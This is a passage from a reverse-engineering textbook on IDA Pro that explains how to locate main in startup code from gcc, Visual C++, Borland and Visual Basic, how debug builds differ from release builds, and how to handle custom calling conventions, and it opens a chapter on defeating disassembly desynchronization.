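        if m0 == "call" and stores_eax and calls_exit:
            return o0
    return None
```

Applied to the FreeBSD excerpt above, the only call that satisfies the pattern is the call to sub_8048400.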

If the previous program was statically linked and stripped, the start rou-

tine would have the same structure as the preceding example; however, none

of the library functions would have useful names. In that case, the main func-

tion would continue to stand out as the only function that is called with three

parameters. Of course, applying FLIRT signatures as early as possible would

also help to restore many of the library function names and make main stand

out, as it does in the preceding example.

In order to demonstrate that the same compiler may generate a com-

pletely different style of code when running on a different platform, consider

the following example, also created using gcc, of a dynamically linked,

stripped binary taken from a Linux system:

.text:080482B0 start proc near
.text:080482B0 xor ebp, ebp
.text:080482B2 pop esi
.text:080482B3 mov ecx, esp
.text:080482B5 and esp, 0FFFFFFF0h
.text:080482B8 push eax
.text:080482B9 push esp
.text:080482BA push edx
.text:080482BB Xpush offset sub_80483C0
.text:080482C0 Ypush offset sub_80483D0
.text:080482C5 push ecx
.text:080482C6 push esi
.text:080482C7 Zpush offset loc_8048384
.text:080482CC call ___libc_start_main
.text:080482D1 hlt
.text:080482D1 start endp

5. Windows GUI applications require a WinMain function instead of main. Documentation
regarding WinMain can be found here: http://msdn2.microsoft.com/en-us/library/ms633559.aspx.

In this example, start makes a single function call to ___libc_start_main.

The purpose of ___libc_start_main is to perform all of the same types of tasks

that were performed in the preceding FreeBSD example, including calling

main and ultimately exit. Since ___libc_start_main is a library function, we

know that the only way it knows where main actually resides is that it is told

via one of its parameters (of which there appear to be eight). Clearly two

of the parameters X and Y are pointers to functions, while a third Z is a

pointer to a location within the .text section. There are few clues in the pre-

vious listing as to which function might be main, so you might need to analyze

the code at the three potential locations in order to correctly locate main.

This might be a useful exercise; however, you may prefer simply to remem-

ber that the first argument (topmost on the stack and therefore last pushed)

to ___libc_start_main is in fact a pointer to main. There are two factors that

combine to prevent IDA from identifying loc_8048384 as a function (which

would have been named sub_8048384). The first is that the function is never

called directly, so loc_8048384 never appears as the target of a call instruction.

The second is that although IDA contains heuristics to recognize functions
based on their prologues (which is why sub_80483C0 and sub_80483D0 are
identified as functions even though they too are never called directly), the
function at loc_8048384 (main) does not use a prologue recognized by IDA. The
offending prologue (with comments) is shown here:

.text:08048384 loc_8048384: ; DATA XREF: start+17↑o

.text:08048384 lea ecx, [esp+4] ; address of arg_0 into ecx

.text:08048388 and esp, 0FFFFFFF0h ; 16 byte align esp

.text:0804838B push dword ptr [ecx-4] ; push copy of return address

.text:0804838E Xpush ebp ; save caller's ebp

.text:0804838F Ymov ebp, esp ; initialize our frame pointer

.text:08048391 push ecx ; save ecx

.text:08048392 Zsub esp, 24h ; allocate locals

This prologue clearly contains the elements of a traditional prologue

for a function that uses EBP as a frame pointer. The caller’s frame pointer is

saved X before setting the frame pointer for the current function Y and

finally allocating space for local variables Z. The problem for IDA is that these

actions do not occur as the first actions within the function, and thus IDA’s

heuristics fail. It is a simple enough matter to manually create a function

(EditFunctionsCreate Function) at this point, but you should take care


to monitor IDA’s behavior. Just as it failed to identify the function in the first

place, it may fail to recognize the fact that the function uses EBP as a frame

pointer. In such a case, you would need to edit the function (ALT-P) to force

IDA to believe that the function has a BP-based frame as well as to make adjust-

ments to the number of stack bytes dedicated to saved registers and local

variables.
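When adjusting the saved-register and local-variable sizes by hand, it can help to trace the stack pointer through the prologue. The following sketch follows ESP, EBP, and ECX through the seven instructions of the prologue shown earlier; the starting ESP value used in the usage note is an arbitrary assumption, and the function name is hypothetical.

```python
MASK32 = 0xFFFFFFFF


def trace_prologue(esp):
    """Follow ESP, EBP, and ECX through the gcc main prologue shown earlier."""
    ecx = (esp + 4) & MASK32         # lea  ecx, [esp+4]
    esp &= 0xFFFFFFF0                # and  esp, 0FFFFFFF0h (round down to 16)
    esp = (esp - 4) & MASK32         # push dword ptr [ecx-4]
    esp = (esp - 4) & MASK32         # push ebp
    ebp = esp                        # mov  ebp, esp
    esp = (esp - 4) & MASK32         # push ecx
    esp = (esp - 0x24) & MASK32      # sub  esp, 24h
    return {"esp": esp, "ebp": ebp, "ecx": ecx}
```

Starting from an ESP of 0xBFFFF7AC, the trace ends with EBP 0x28 bytes above ESP: 4 bytes for the saved ECX plus the 0x24 bytes allocated for local variables.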

As in the case of the FreeBSD binary, if the preceding Linux example

happened to be both statically linked and stripped, the start routine would

not change at all other than the fact that the name for ___libc_start_main

would be missing. You could still locate main by remembering that gcc’s Linux

start routine makes only one function call and that the first parameter to that

function is the address of main.

On the Windows side of the house, the number of C/C++ compilers

(and therefore the number of startup routines) in use is somewhat higher.

Perhaps not surprisingly, in the case of gcc on Windows, it is possible to

leverage some of the knowledge gained by studying gcc’s behavior on other

platforms. The startup routine shown here is from a gcc/Cygwin binary:

.text:00401000 start proc near

.text:00401000

.text:00401000 var_28 = dword ptr -28h

.text:00401000 var_24 = dword ptr -24h

.text:00401000 var_20 = dword ptr -20h

.text:00401000 var_2 = word ptr -2

.text:00401000

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 sub esp, 28h

.text:00401006 and esp, 0FFFFFFF0h

.text:00401009 fnstcw [ebp+var_2]

.text:0040100C movzx eax, [ebp+var_2]

.text:00401010 and ax, 0F0C0h

.text:00401014 mov [ebp+var_2], ax

.text:00401018 movzx eax, [ebp+var_2]

.text:0040101C or ax, 33Fh

.text:00401020 mov [ebp+var_2], ax

.text:00401024 fldcw [ebp+var_2]

.text:00401027 ➋ mov [esp+28h+var_28], offset sub_4010B0

.text:0040102E ➊ call sub_401120

Clearly this code does not map cleanly to the previous Linux-based example. However, there is one striking similarity: only one function is called ➊, and the function takes a function pointer as a parameter ➋. In this case sub_401120 serves much the same purpose as ___libc_start_main, while sub_4010B0 turns out to be the main function of the program.

Windows binaries compiled using gcc/MinGW make use of yet another

style of start function, as shown here:

.text:00401280 start proc near

.text:00401280

.text:00401280 var_8 = dword ptr -8

.text:00401280

.text:00401280 push ebp

.text:00401281 mov ebp, esp

.text:00401283 sub esp, 8

.text:00401286 mov [esp+8+var_8], 1

.text:0040128D call ds:__set_app_type

.text:00401293 ➊ call sub_401150

.text:00401293 start endp

This is another case in which IDA will fail to identify the program’s main function. The preceding code offers few clues as to the location of main, as there is only one nonlibrary function called ➊ (sub_401150) and that function does not appear to take any arguments (as main should). In this instance, the best course of action is to continue the search for main within sub_401150. A portion of sub_401150 is shown here:

.text:0040122A call __p__environ

.text:0040122F mov eax, [eax]

.text:00401231 ➍ mov [esp+8], eax

.text:00401235 mov eax, ds:dword_404000

.text:0040123A ➌ mov [esp+4], eax

.text:0040123E mov eax, ds:dword_404004

.text:00401243 ➋ mov [esp], eax

.text:00401246 ➊ call sub_401395

.text:0040124B mov ebx, eax

.text:0040124D call _cexit

.text:00401252 mov [esp], ebx

.text:00401255 call ExitProcess

In this example, the function turns out to have many similarities with the start function associated with FreeBSD that we saw earlier. Process of elimination points to sub_401395 ➊ as the likely candidate for main, as it is the only nonlibrary function that is called with three arguments: ➋, ➌, and ➍. Also, the third argument ➍ is related to the return value of the __p__environ library function, which correlates well with the fact that main’s third argument is expected to be a pointer to the environment strings array. The example code is also preceded by a call to the __getmainargs library function (not shown), which is called to set up the argc and argv parameters prior to actually calling main. This helps to reinforce the notion that main is about to be called.
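The process of elimination described here can be approximated mechanically. The following Python sketch is an illustration only and does not use any IDA API: it assumes the instructions have already been transcribed into hypothetical (mnemonic, operands) tuples, counts the distinct [esp+N] slots written since the previous call, and reports the sub_ functions that receive exactly three stack arguments. The helper names stack_args_per_call and main_candidates are invented for this example.

```python
import re

# Simplified (mnemonic, operands) tuples transcribed from the sub_401150 fragment.
LISTING = [
    ("call", "__p__environ"),
    ("mov", "eax, [eax]"),
    ("mov", "[esp+8], eax"),
    ("mov", "eax, ds:dword_404000"),
    ("mov", "[esp+4], eax"),
    ("mov", "eax, ds:dword_404004"),
    ("mov", "[esp], eax"),
    ("call", "sub_401395"),
    ("mov", "ebx, eax"),
    ("call", "_cexit"),
    ("mov", "[esp], ebx"),
    ("call", "ExitProcess"),
]

# Matches a store whose destination is [esp] or [esp+N].
STACK_STORE = re.compile(r"^\[esp(?:\+([0-9A-Fa-f]+)h?)?\],")


def stack_args_per_call(listing):
    """Return [(call_target, stack_slots_written_since_previous_call)]."""
    results = []
    slots = set()
    for mnem, ops in listing:
        if mnem == "call":
            results.append((ops, len(slots)))
            slots = set()
        elif mnem == "mov":
            match = STACK_STORE.match(ops)
            if match:
                slots.add(int(match.group(1) or "0", 16))
    return results


def main_candidates(listing, argc=3):
    """Nonlibrary (sub_*) call targets that receive exactly argc stack arguments."""
    return [target for target, count in stack_args_per_call(listing)
            if target.startswith("sub_") and count == argc]


print(main_candidates(LISTING))  # ['sub_401395']
```

A heuristic like this only narrows the search. Compilers that push arguments, reuse outgoing argument slots, or pass values in registers would need a more careful model.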


The start routine for Visual C/C++ code is short and sweet, as seen here:

.text:0040134B start proc near

.text:0040134B call ___security_init_cookie

.text:00401350 jmp ___tmainCRTStartup

.text:00401350 start endp

IDA has actually recognized the library routines referenced in the two

instructions through the application of startup signatures rather than by

the fact that the program is linked to a dynamic library containing the given

symbols. IDA’s startup signatures provide easy location of the initial call to

main, as shown here:

.text:004012D8 mov eax, envp

.text:004012DD mov dword_40ACF4, eax

.text:004012E2 push eax ; envp

.text:004012E3 push argv ; argv

.text:004012E9 push argc ; argc

.text:004012EF ➊ call _main

.text:004012F4 add esp, 0Ch

.text:004012F7 mov [ebp+var_1C], eax

.text:004012FA cmp [ebp+var_20], 0

.text:004012FE jnz short $LN35

.text:00401300 push eax ; uExitCode

.text:00401301 call $LN27

.text:00401306 $LN35: ; CODE XREF: ___tmainCRTStartup+169↓j

.text:00401306 call __cexit

.text:0040130B jmp short loc_40133B

Within the entire body of ___tmainCRTStartup, _main is the only function

called with exactly three arguments. Further analysis would reveal that the

call to _main is preceded by a call to the GetCommandLine library function, which

is yet another indication that a program’s main function may be called shortly.

As a final note concerning the use of startup signatures, it is important to

understand that, in this example, IDA has generated the name _main entirely

on its own as a result of matching a startup signature. The ASCII string main

appeared nowhere in the binary used in this example. Thus, you can expect

main to be found and labeled anytime a startup signature is matched, even

when a binary has been stripped of its symbols.

The last startup routine that we will examine for a C compiler is generated

by Borland’s free command-line compiler.6 The last few lines of Borland’s

start routine are shown here:

.text:00401041 ➊ push offset off_4090B8

.text:00401046 push 0 ; lpModuleName

.text:00401048 call GetModuleHandleA

.text:0040104D mov dword_409117, eax

.text:00401052 push 0 ; fake return value

.text:00401054 jmp __startup

6. See http://forms.embarcadero.com/forms/BCC32CompilerDownload/.

The pointer value pushed on the stack ➊ refers to a structure that in turn contains a pointer to main. Within __startup, the setup to call main is shown here:

.text:00406997 mov edx, dword_40BBFC

.text:0040699D ➍ push edx

.text:0040699E mov ecx, dword_40BBF8

.text:004069A4 ➌ push ecx

.text:004069A5 mov eax, dword_40BBF4

.text:004069AA ➋ push eax

.text:004069AB ➊ call dword ptr [esi+18h]

.text:004069AE add esp, 0Ch

.text:004069B1 push eax ; status

.text:004069B2 call _exit

Again, this example bears many similarities to previous examples in that the call to main ➊ takes three arguments ➋, ➌, and ➍ (the only function called within __startup to do so) and the return value is passed directly to _exit to terminate the program. Additional analysis of __startup would reveal calls to the Windows API functions GetEnvironmentStrings and GetCommandLine, which are often precursors to the invocation of main.

Finally, in order to demonstrate that tracking down a program’s main

function is not a problem specific to C programs, consider the following

startup code from a compiled Visual Basic 6.0 program:

.text:004018A4 start:

.text:004018A4 ➊ push offset dword_401994

.text:004018A9 call ThunRTMain

The ThunRTMain library function performs a function similar to the Linux ___libc_start_main function in that its job is to perform any initialization required prior to invoking the actual main function of the program. In order to transfer control to the main function, Visual Basic utilizes a mechanism very similar to that in the Borland code in the earlier examples. ThunRTMain takes a single argument ➊, which is a pointer to a structure containing additional information required for program initialization, including the address of the main function. The content of this structure is shown here:

.text:00401994 dword_401994 dd 21354256h, 2A1FF0h, 3 dup(0) ; DATA XREF: .text:start↑o

.text:004019A8 dd 7Eh, 2 dup(0)

.text:004019B4 dd 0A0000h, 409h, 0

.text:004019C0 ➊ dd offset sub_4045D0

.text:004019C4 dd offset dword_401A1C

.text:004019C8 dd 30F012h, 0FFFFFF00h, 8, 2 dup(1), 0E9h, 401944h, 4018ECh

.text:004019C8 dd 4018B0h, 78h, 7Dh, 82h, 83h, 4 dup(0)

Within this data structure, there is only one item ➊ that appears to reference code at all, the pointer to sub_4045D0, which turns out to be the main function for the program.

In the end, learning how to find main is a matter of understanding how

executable files are built. In cases where you are experiencing difficulties, it

may be beneficial to build some simple executables (with a reference to an

easily identifiable string in main, for example) with the same tools used to

build the binary you are analyzing. By studying your test cases, you will gain

an understanding of the basic structure of binaries built using a specific set

of tools that may assist you in further analyzing more complex binaries built

with the same set of tools.

Debug vs. Release Binaries

Microsoft’s Visual Studio projects are usually capable of building either debug

or release versions of program binaries. One way to note the differences is to

compare the build options specified for the debug version of a project to the

build options specified for the release version. Simple differences include

the fact that release versions are generally optimized,7 while debug versions

are not, and debug versions are linked with additional symbol information

and debugging versions of the runtime library, while release versions are not.

The addition of debugging-related symbols allows debuggers to map assembly

language statements back to their source code counterparts and to deter-

mine the names of local variables.8 Such information is typically lost during

the compilation process. The debugging versions of Microsoft’s runtime

libraries have also been compiled with debugging symbols included, optimi-

zations disabled, and additional safety checks enabled to verify that some

function parameters are valid.

When disassembled using IDA, debug builds of Visual Studio projects

look significantly different from release builds. This is a result of compiler

and linker options specified only in debug builds, such as basic runtime

checks (/RTCx; see footnote 9), which introduce extra code into the resulting binary.

A side effect of this extra code is that it defeats IDA’s startup signature-

matching process, resulting in IDA’s frequent failure to automatically

locate main in debug builds of binaries.

One of the first differences you may notice in a debug build of a binary is

that virtually all functions are reached via jump functions (also known as thunk

functions), as shown in the following code fragments:

➎ .text:00411050 sub_411050 proc near ; CODE XREF: start_0+3↓p

.text:00411050 ➏ jmp sub_412AE0

.text:00411050 sub_411050 endp

...

➊ .text:0041110E start proc near

.text:0041110E ➋ jmp start_0

.text:0041110E start endp

...

➌ .text:00411920 start_0 proc near ; CODE XREF: start↑j

.text:00411920 push ebp

.text:00411921 mov ebp, esp

.text:00411923 ➍ call sub_411050

.text:00411928 call sub_411940

.text:0041192D pop ebp

.text:0041192E retn

.text:0041192E start_0 endp

7. Optimization generally involves elimination of redundancy in code or selection of faster, but potentially larger, sequences of code in order to satisfy a developer’s desire to create either faster or smaller executable files. Optimized code may not be as straightforward to analyze as nonoptimized code and may therefore be considered a bad choice for use during a program’s development and debugging phases.

8. gcc also offers the ability to insert debugging symbols during the compilation process.

9. See http://msdn.microsoft.com/en-us/library/8wtf2dfz.aspx.

In this example, the program entry point ➊ does nothing other than jump ➋ to the actual startup function ➌. The startup function, in turn, calls ➍ another function ➎, which simply jumps ➏ to the actual implementation of that function. The two functions ➊ and ➎ that contain nothing but a single jump statement are called thunk functions. The heavy use of thunk functions in debug binaries is one of the obstacles to IDA’s signature-matching process. While the presence of thunk functions may briefly slow down your analysis, using the techniques described in the previous section, it is still possible to track down the main function of the binary.
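Following thunks by hand quickly becomes tedious, so it can help to think of them as a simple lookup table. The Python sketch below is a minimal illustration, assuming the thunk addresses and jump targets have already been collected into a dictionary (here copied from the listing); the resolve_thunk helper is hypothetical and is not part of IDA.

```python
# Thunk address -> jump target, taken from the debug-build listing.
THUNKS = {
    0x0041110E: 0x00411920,  # start      -> start_0
    0x00411050: 0x00412AE0,  # sub_411050 -> sub_412AE0
}


def resolve_thunk(addr, thunks, max_hops=16):
    """Follow single-jmp thunks until a non-thunk address is reached.

    The seen set and max_hops guard against malformed tables that loop.
    """
    seen = set()
    while addr in thunks and addr not in seen and len(seen) < max_hops:
        seen.add(addr)
        addr = thunks[addr]
    return addr


print(hex(resolve_thunk(0x0041110E, THUNKS)))  # 0x411920
print(hex(resolve_thunk(0x00411050, THUNKS)))  # 0x412ae0
```

With the thunks resolved, the call at 00411923 can be read as a direct call to sub_412AE0, which is how the startup code would look in a build without thunks.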

The basic runtime checks in a debug build cause several additional

operations to be performed upon entry to any function. An example of

an extended prologue in a debug build is shown here:

.text:00411500 push ebp

.text:00411501 mov ebp, esp

.text:00411503 ➊ sub esp, 0F0h

.text:00411509 push ebx

.text:0041150A push esi

.text:0041150B push edi

.text:0041150C ➋ lea edi, [ebp+var_F0]

.text:00411512 mov ecx, 3Ch

.text:00411517 mov eax, 0CCCCCCCCh

.text:0041151C rep stosd

.text:0041151E ➌ mov [ebp+var_8], 0

.text:00411525 mov [ebp+var_14], 1

.text:0041152C mov [ebp+var_20], 2

.text:00411533 mov [ebp+var_2C], 3

The function in this example utilizes four local variables that should require only 16 bytes of stack space. Instead we see that this function allocates 240 bytes ➊ of stack space and then proceeds to fill each of the 240 bytes with the value 0xCC (rep stosd stores ECX = 3Ch doublewords, or 60 × 4 = 240 bytes). The four lines starting at ➋ equate to the following function call:

memset(&var_F0, 0xCC, 240);

The byte value 0xCC corresponds to the x86 opcode for int 3, which is a software interrupt that causes a program to trap to a debugger. The intent of filling the stack frame with an overabundance of 0xCC values may be to ensure that the debugger is invoked in the event that the program somehow attempts to execute instructions from the stack (an error condition that one would hope to catch in a debug build).

The function’s local variables are initialized beginning at ➌, where we note that the variables are not adjacent to one another. The intervening space will have been filled with the value 0xCC by the preceding memset operation. Providing extra space between variables in this manner can make it easier to detect overflows from one variable that may spill into and corrupt another variable. Under normal conditions, none of the 0xCC values used as filler, outside of any declared variables, should be overwritten. For comparison purposes, the release version of the same code is shown here:

.text:004018D0 push ebp

.text:004018D1 mov ebp, esp

.text:004018D3 ➊ sub esp, 10h

.text:004018D6 ➋ mov [ebp+var_4], 0

.text:004018DD mov [ebp+var_C], 1

.text:004018E4 mov [ebp+var_8], 2

.text:004018EB mov [ebp+var_10], 3

In the release version we see that only the required amount of space is requested for local variables ➊ and that all four local variables are adjacent to one another ➋. Also note that the use of 0xCC as a filler value has been eliminated.
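To make the purpose of the filler bytes concrete, the following Python sketch models the debug-build frame as a byte array. It is a simplified illustration under stated assumptions, not a description of how the Visual Studio runtime checks are actually implemented: the frame size, fill count, and variable offsets are taken from the debug listing, while new_frame, index_of, and clobbered_filler are hypothetical helpers.

```python
FRAME_SIZE = 0xF0    # sub esp, 0F0h
FILL_DWORDS = 0x3C   # mov ecx, 3Ch
FILL_BYTE = 0xCC     # each byte of 0CCCCCCCCh (the int 3 opcode)

# rep stosd stores ECX doublewords, so 0x3C * 4 bytes covers the whole frame.
assert FILL_DWORDS * 4 == FRAME_SIZE == 240

# Offsets below EBP of the four 4-byte locals in the debug listing.
LOCALS = {"var_8": 0x8, "var_14": 0x14, "var_20": 0x20, "var_2C": 0x2C}


def new_frame():
    """Model the frame as a bytearray; index 0 is the byte at ebp-0F0h."""
    return bytearray([FILL_BYTE]) * FRAME_SIZE


def index_of(offset_below_ebp):
    """Translate an ebp-relative offset into an index into the bytearray."""
    return FRAME_SIZE - offset_below_ebp


def clobbered_filler(frame):
    """Return indexes of filler bytes that no longer hold 0xCC."""
    owned = set()
    for off in LOCALS.values():
        start = index_of(off)
        owned.update(range(start, start + 4))
    return [i for i, b in enumerate(frame) if i not in owned and b != FILL_BYTE]


frame = new_frame()
# Initialize the locals to 0, 1, 2, 3 as the listing does.
for value, off in enumerate(LOCALS.values()):
    start = index_of(off)
    frame[start:start + 4] = value.to_bytes(4, "little")
print(clobbered_filler(frame))  # []

# Hypothetical bug: six bytes written into the 4-byte var_14.
start = index_of(LOCALS["var_14"])
frame[start:start + 6] = b"AAAAAA"
print(clobbered_filler(frame))  # [224, 225]
```

In this model each 4-byte variable is followed by 8 bytes of filler, so a small overflow lands in filler rather than in the neighboring variable, and a changed filler byte marks the overflow.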

Alternative Calling Conventions

In Chapter 6, we discussed the most common calling conventions utilized

in C and C++ code. While adherence to a published calling convention is

crucial when attempting to interface one compiled module to another, noth-

ing prohibits the use of custom calling conventions by functions within a sin-

gle module. This is commonly seen in highly optimized functions that are not

designed to be called from outside the module in which they reside.

The following code represents the first four lines of a function that uses

a nonstandard calling convention:

.text:000158AC sub_158AC proc near

.text:000158AC

➊ .text:000158AC arg_0 = dword ptr 4

.text:000158AC

.text:000158AC push [esp+arg_0]

.text:000158B0 ➋ mov edx, [eax+118h]

.text:000158B6 push eax

.text:000158B7 ➌ movzx ecx, cl

.text:000158BA mov cl, [edx+ecx+0A0h]

According to IDA’s analysis, only one argument ➊ exists in the function’s stack frame. However, upon closer inspection of the code, you can see that both the EAX register ➋ and the CL register ➌ are used without any initialization taking place within the function. The only possible conclusion is that both EAX and CL are expected to be initialized by the caller. Therefore, you should view this function as a three-argument function rather than a single-argument function, and you must take special care when calling it to ensure that the three arguments are all in their proper places.

IDA allows you to specify custom calling conventions for any function by setting the function’s “type.” This is done by entering the function’s prototype via the Edit ▸ Functions ▸ Set function type menu option and using IDA’s __usercall calling convention. Figure 20-1 shows the resulting dialog used to set the type for sub_158AC in the preceding example.

Figure 20-1: Designating a function as __usercall

For clarity, the declaration is shown again here:

int __usercall sub_158AC<eax>(struc_1 *<eax>, unsigned __int8 index<cl>, int)

Here the IDA keyword __usercall is used in place of one of the standard

calling conventions such as __cdecl or __stdcall. The use of __usercall requires

us to tell IDA the name of the register used to hold the function’s return

value by appending the register name to the name of the function (yielding

sub_158AC<eax> in this case). If the function returns no value, the return regis-

ter may be omitted. Within the parameter list, each register-based parameter

must also be annotated by appending the corresponding register name to

the parameter’s data type. After the function’s type has been set, IDA propa-

gates parameter information to calling functions, which results in improved

commenting of function call sequences as shown in the following listing:

.text:00014B9F ➊ lea eax, [ebp+var_218] ; struc_1 *

.text:00014BA5 ➋ mov cl, 1 ; index

.text:00014BA7 ➌ push edx ; int

.text:00014BA8 call sub_158AC

Here it is clear that IDA recognizes that EAX will hold the first argument to the function ➊, CL will hold the second argument ➋, and the third argument will be placed on the stack ➌.

To demonstrate that calling conventions can vary widely even within a single executable, a second example using a custom calling convention is taken from the same binary file and shown here:

.text:0001669E sub_1669E proc near

.text:0001669E

➊ .text:0001669E arg_0 = byte ptr 4

.text:0001669E

.text:0001669E ➋ mov eax, [esi+18h]

.text:000166A1 add eax, 684h

.text:000166A6 cmp [esp+arg_0], 0

Here again, IDA has indicated that the function accesses only one argument ➊ within the stack frame. Closer inspection makes it quite clear that the ESI register ➋ is also expected to be initialized prior to calling this function. This example demonstrates that even within the same binary file, the registers chosen to hold register-based arguments may vary from function to function.

The lesson to be learned here is to make certain that you understand

how each register used in a function is initialized. If a function makes use of

a register prior to initializing that register, then the register is being used to

pass a parameter. Please refer to Chapter 6 for a review of which registers are

used by various compilers and common calling conventions.
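The rule of thumb above (a register that is read before it is written is probably an incoming argument) is easy to express in code. The following Python sketch is a rough illustration that assumes each instruction has been annotated by hand with the registers it reads and writes; the annotations, the PARENT alias table, and the uninitialized_reads helper are all hypothetical and deliberately simplified. A write to a sub-register such as CL is treated as a write to the whole of ECX.

```python
# Parent 32-bit register for the sub-registers that appear in the examples.
PARENT = {"al": "eax", "ax": "eax", "cl": "ecx", "cx": "ecx",
          "dl": "edx", "dx": "edx", "bl": "ebx", "bx": "ebx"}
# Stack bookkeeping registers are not treated as argument carriers here.
IGNORED = {"esp", "ebp"}


def canon(reg):
    """Map a sub-register name to its 32-bit parent register."""
    return PARENT.get(reg, reg)


def uninitialized_reads(instructions):
    """instructions: iterable of (reads, writes) register-name lists.

    Returns the registers that are read before the function writes them,
    in order of first use.
    """
    written, suspects = set(), []
    for reads, writes in instructions:
        for reg in map(canon, reads):
            if reg not in written and reg not in IGNORED and reg not in suspects:
                suspects.append(reg)
        written.update(map(canon, writes))
    return suspects


# Hand-annotated reads/writes for the first instructions of sub_158AC.
SUB_158AC = [
    (["esp"], ["esp"]),         # push [esp+arg_0]
    (["eax"], ["edx"]),         # mov edx, [eax+118h]
    (["eax", "esp"], ["esp"]),  # push eax
    (["cl"], ["ecx"]),          # movzx ecx, cl
    (["edx", "ecx"], ["cl"]),   # mov cl, [edx+ecx+0A0h]
]

# Hand-annotated reads/writes for the first instructions of sub_1669E.
SUB_1669E = [
    (["esi"], ["eax"]),         # mov eax, [esi+18h]
    (["eax"], ["eax"]),         # add eax, 684h
    (["esp"], []),              # cmp [esp+arg_0], 0
]

print(uninitialized_reads(SUB_158AC))  # ['eax', 'ecx']
print(uninitialized_reads(SUB_1669E))  # ['esi']
```

A check like this produces false positives for registers that a function merely saves and restores (for example, push ebx at function entry), so its output is a list of candidates to inspect rather than a definitive argument list.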

Summary

Compiler-specific behaviors are too numerous to cover in a single chapter (or even a single book, for that matter). Among other behaviors, compilers differ in the algorithms they employ to implement various high-level constructs and the manner in which they choose to optimize generated code. Because a compiler’s behavior is heavily influenced by the options supplied to the compiler during the build process, it is possible for one compiler to generate radically different binaries when fed the same source but different build options. Unfortunately, learning to cope with all of these variations is usually a matter of experience. Further complicating matters is the fact that it is often very difficult to search for help on specific assembly language constructs, because it is hard to craft search expressions that will yield results specific to your particular case. When this happens, your best resource is generally a forum dedicated to reverse engineering in which you can post code and benefit from the knowledge of others who have had similar experiences.


OBFUSCATED CODE ANALYSIS

Even under ideal circumstances, comprehending a disassembly listing is a difficult task at best. High-quality disassemblies are essential for anyone contemplating digging into the inner workings of a binary, which is precisely why we have spent the last 20 chapters discussing IDA Pro

and its capabilities. It can be argued that IDA is so effective at what it does

that it has lowered the barriers for entry into the binary analysis field. While

certainly not attributable to IDA alone, the fact that the state of binary reverse

engineering has advanced so far in recent years is not lost on anyone who does

not want his software to be analyzed. Thus, over the last several years, an

arms race of sorts has been taking place between reverse engineers and pro-

grammers who wish to keep their code secret. In this chapter we will examine

IDA’s role in this arms race and discuss some of the measures that have been

taken to protect code, along with how to defeat those measures using IDA.

Various dictionary definitions will inform you that obfuscation is the act of

making something obscure, perplexing, confusing, or bewildering in order

to prevent others from understanding the obfuscated item. Anti–reverse


engineering, on the other hand, encompasses a broader range of techniques

(obfuscation being one of them) designed to hinder analysis of an item. In

the context of this book and the use of IDA, the items to which such anti–

reverse engineering techniques may be applied are binary executable files (as

opposed to source files or silicon chips, for example).

In order to consider the impact of obfuscation, and anti–reverse engineer-

ing techniques in general, on the use of IDA, it is first useful to categorize

some of these techniques in order to understand exactly how each may man-

ifest itself. It is important to note that there is no one correct way to catego-

rize each technique, as the general categories that follow often overlap in

their descriptions. In addition, new anti–reverse engineering techniques are

under continuous development, and it is not possible to provide a single, all-

inclusive list.

Anti–Static Analysis Techniques

The primary purpose of anti–static analysis techniques is to prevent an analyst

from understanding the nature of a program without actually running the

program. These are precisely the types of techniques that target disassemblers

such as IDA and are thus of greatest concern if IDA is your weapon of choice

for reverse engineering binaries. Several types of anti–static analysis techniques

are discussed here.

Disassembly Desynchronization

One of the older techniques designed to frustrate the disassembly process

involves the creative use of instructions and data to prevent the disassembly

from finding the correct starting address for one or more instructions. Forcing

the disassembler to lose track of itself in this manner usually results in a failed

or, at a minimum, incorrect disassembly listing.

The following listing shows IDA’s efforts to disassemble a portion of the Shiva anti–reverse engineering tool (see footnote 1):

LOAD:0A04B0D1 call ➊ near ptr loc_A04B0D6+1

LOAD:0A04B0D6

LOAD:0A04B0D6 loc_A04B0D6: ; CODE XREF: start+11↓p

➋ LOAD:0A04B0D6 mov dword ptr [eax-73h], 0FFEB0A40h

LOAD:0A04B0D6 start endp

LOAD:0A04B0D6

LOAD:0A04B0DD

LOAD:0A04B0DD loc_A04B0DD: ; CODE XREF: LOAD:0A04B14C↓j

LOAD:0A04B0DD loopne loc_A04B06F

LOAD:0A04B0DF mov dword ptr [eax+56h], 5CDAB950h

➌ LOAD:0A04B0E6 iret

LOAD:0A04B0E6 ;---------------------------------------------------------------

➍ LOAD:0A04B0E7 db 47h

LOAD:0A04B0E8 db 31h, 0FFh, 66h

LOAD:0A04B0EB ;---------------------------------------------------------------

LOAD:0A04B0EB

LOAD:0A04B0EB loc_A04B0EB: ; CODE XREF: LOAD:0A04B098↑j

LOAD:0A04B0EB mov edi, 0C7810D98h

1. Shaun Clowes and Neel Mehta first introduced Shiva at CanSecWest in 2003. See http://www.cansecwest.com/core03/shiva.ppt.

This example executes a call ➊ (a jump can just as easily be used) into the middle of an existing instruction ➋. Since the function call is assumed to return, the succeeding instruction at address 0A04B0D6 ➋ is disassembled (incorrectly). The actual target of the call instruction, loc_A04B0D6+1 (0A04B0D7), cannot be disassembled because the associated bytes have already been incorporated into the 7-byte instruction at 0A04B0D6 (which occupies 0A04B0D6 through 0A04B0DC). Assuming we notice that this is taking place, the remainder of the disassembly must be considered suspect. Evidence of this fact shows up in the form of instructions that are unexpected in user-space code ➌ (in this case an iret; see footnote 2) and miscellaneous data bytes ➍.

Note that this type of behavior is not restricted to IDA. Virtually all

disassemblers, whether they utilize a recursive descent algorithm or a linear

sweep algorithm, fall victim to this technique.

The proper way to deal with this situation in IDA is to undefine the instruction that contains the bytes that are the target of the call and then define an instruction at the call target address in an attempt to resynchronize the disassembly. Of course, the use of an interactive disassembler greatly simplifies this process. Using IDA, a quick Edit ▸ Undefine (hotkey U) with the cursor positioned on the instruction at 0A04B0D6, followed by an Edit ▸ Code (hotkey C) with the cursor repositioned on address 0A04B0D7, results in the listing shown here:

LOAD:0A04B0D1 call loc_A04B0D7

LOAD:0A04B0D1 ;------------------------------------------------------------

➊ LOAD:0A04B0D6 db 0C7h ; ¦

LOAD:0A04B0D7 ;------------------------------------------------------------

LOAD:0A04B0D7

LOAD:0A04B0D7 loc_A04B0D7: ; CODE XREF: start+11↑p

➋ LOAD:0A04B0D7 pop eax

LOAD:0A04B0D8 lea eax, [eax+0Ah]

LOAD:0A04B0DB

LOAD:0A04B0DB loc_A04B0DB: ; CODE XREF: start:loc_A04B0DB↑j

➌ LOAD:0A04B0DB jmp short near ptr loc_A04B0DB+1

LOAD:0A04B0DB start endp

LOAD:0A04B0DB

